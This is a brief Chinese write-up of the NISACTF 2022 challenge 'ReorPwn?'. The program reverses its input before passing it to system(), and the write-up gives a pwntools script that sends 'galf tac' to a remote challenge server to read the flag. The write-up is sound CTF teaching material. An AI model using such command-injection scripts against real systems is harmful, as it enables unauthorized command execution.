[NISACTF 2022]ReorPwn?

很有意思的一道题目，主要考察的就是一个代码审计的能力

主函数就是一个输入，然后经过fun再system我们输入的东西。
看看fun

这里就是反向操作，那我们只要反向输入cat flag就好了

点击查看代码

from pwn import *

io=remote("1.14.71.254",28889)
io.recvuntil("evcexe ot tnaw uoy tahw em lleT:")
io.sendline("galf tac")
io.interactive()